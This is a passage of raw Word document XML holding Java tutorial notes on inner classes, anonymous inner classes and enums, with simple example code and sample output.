          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++)</w:t>
      </w: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168CF944"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136733"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                count</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394365C4"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136733"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A3F5A7"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136733"/>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5214059F"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136733"/>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65288B90"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136733"/>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5F7EF53E"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136733"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249334E0"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136733"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> startThread</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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3E6037B0"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136733"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerThread</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerThread</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C452B44"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136733"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        thread</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54997863" w14:textId="77777777"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136733"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EBF1BC" w14:textId="5CD37E1B" w:rsidR="0023650C" w:rsidRPr="0023650C" w:rsidRDefault="002365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136733"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF9D22" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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9. Anonymous Inner Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022BE697" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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nonymous inner classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used when you need to create an instance of a class that implements an interface or extends a class and you don’t want to create a separate named class for it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939DC09" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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is commonly seen in frameworks or libraries where you can pass behavior (such as event listeners) directly as parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB336A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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07B05ACE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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purpose of inner classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to provide a means of grouping classes that are logically related to each other and encapsulate them within a parent class. They enhance encapsulation, help access outer class members, and improve code readability and maintainability. Inner classes are especially useful in cases like event handling, callbacks, iteration, and implementing certain design patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C38A43F" w14:textId="5077B51C"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BCC8784">
          <v:rect id="_x0000_i1181" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE7F1C7" w14:textId="36A03954" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="006513B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc196307534"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is Enum? Write a syntax for enum</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="19925C5E" w14:textId="6E5C7E04" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (short for "enumeration") is a special Java type used to define collections of constants. It is a way of defining a type that can hold a predefined set of constant values. Enums are typically used when you need a fixed set of constants, such as days of the week, months of the year, or a set of commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE3866" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E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Features of Enums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F66803" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ype-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enums provide type safety by ensuring that only valid constants are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F011575" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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xed set of constants</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once an enum is defined, it cannot have additional values added to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A0DF3A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enums can have fields, methods, and constructors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A096FA" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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mplements java.lang.Enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All enums implicitly extend java.lang.Enum, and thus they inherit methods like ordinal(), name(), and values().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CCC5AA" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E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yntax for Enum in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C80A95"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s the basic syntax for defining an enum in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4AF1D6"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um EnumName {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692C744F"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NSTANT1, CONSTANT2, CONSTANT3; // List of enum constants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6976E52C"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142A719" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E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an Enum in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451122F4"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Enum to represent Days of the Week</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D76BF4F"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um Day {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F961D48"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UNDAY, MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEE15FF"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4CE8C03" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DE27A8"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EnumExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA42655"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175F5D9A"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ccessing an enum constant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4096A4CD"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ay today = Day.MONDAY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3D2DBA" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C102FEF"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nting enum constant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540BA4F0"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Today is: " + today);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC35F1B" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B24796F"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sing enum with switch statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31535D02"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witch (today) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623ECB7"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ase MONDAY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D2444"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tart of the week!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4FAE0"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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3949BB"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ase FRIDAY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCE430E"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Weekend is near!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF4BCD"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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153BB78A"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efault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFCE839"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Another day!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765AA4D"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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52430C69"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13FFA13"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E699441"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3694412" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E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p w14:paraId="28656B2A"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oday is: MONDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CCF137"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rt of the week!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324EA558" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E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num with Fields and Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E29FD0F"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ums can also have fields, constructors, and methods to store additional information or perform specific operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDDE4FD"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um Day {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA6B520"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UNDAY("Weekend"), MONDAY("Weekday"), TUESDAY("Weekday"), WEDNESDAY("Weekday"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F3FCD"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URSDAY("Weekday"), FRIDAY("Weekday"), SATURDAY("Weekend");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF77A3" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405D6BBA"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final String type; // Field to store the type of day (Weekend/Weekday)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA8B4C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BEBC72"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 Constructor to initialize the type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28505973"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ay(String type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D846A2B"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type = type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9C1D9"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1BE6D95" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="617EDF78"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Method to get the type of day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FDF7A"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ring getType() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D1FD7"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this.type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB50C0"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D55A0D4"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907BF01" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693768F8"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EnumExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2E99C"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0988AE49"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ccessing an enum constant and its method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B92EB3A"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ay today = Day.MONDAY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E56FF91"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Today is " + today + " and it is a " + today.getType());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A971BF1"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217C437"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4CF5FC1" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E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p w14:paraId="729926A2" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E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oday is MONDAY and it is a Weekday</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C058A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D8687" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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nums are implicitly public, static, and final</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
